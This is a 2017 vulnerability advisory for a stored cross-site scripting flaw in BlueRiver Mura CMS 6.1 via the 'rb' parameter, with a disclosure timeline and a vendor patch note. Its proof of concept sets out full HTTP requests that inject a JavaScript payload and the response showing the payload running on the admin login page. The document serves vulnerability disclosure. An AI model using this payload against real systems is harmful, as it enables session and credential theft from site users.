2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.

Original release date: 30, 05 2017
Last revised: May 30, 2017
Severity: 7.5 CVSSv2/AV:N/AC:L/AU:N/C:P/I:P/A:P

BACKGROUND

Mura CMS is an open source content management system for CFML, created by Blue River Interactive Group.

Mura has been designed to be used by marketing departments, web designers and developers and it's widely used by important companies and organizations around the world like NATO, NASA, GSA, European Commision, Intel, P&G, USA FDA, USA Social Security Administration, USA Senate, USA Navy, USA Dept of Health and Human Services, USA Dept. of Homeland, Schneider, First Hawaian Bank, Boeing, Baylor College of Medicine and Michigan State University.

DESCRIPTION

BlueRiver Mura CMS is vulnerable to Stored Cross Site Scripting Attacks via rb parameter.
The Stored Cross Site Scripting is executed every time a user visit Mura CMS Administration Login Page.

PROOF OF CONCEPT 

########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1

########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0

########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1


########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close

<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

This vulnerability was verified in BlueRiver Mura CMS 6.1 running under Adobe ColdFusion.

SOLUTION

Contact vendor for a fix.

REVISION HISTORY

May 30, 2017: Initial release

DISCLOSURE TIMELINE

  • May 29, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • May 30, 2017 : Contact with Google Security Team.
  • June 2, 2017 : Vendor Response/Feedback: this issue has been patched already in the latest 6.1 version.

REFERENCES

 

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.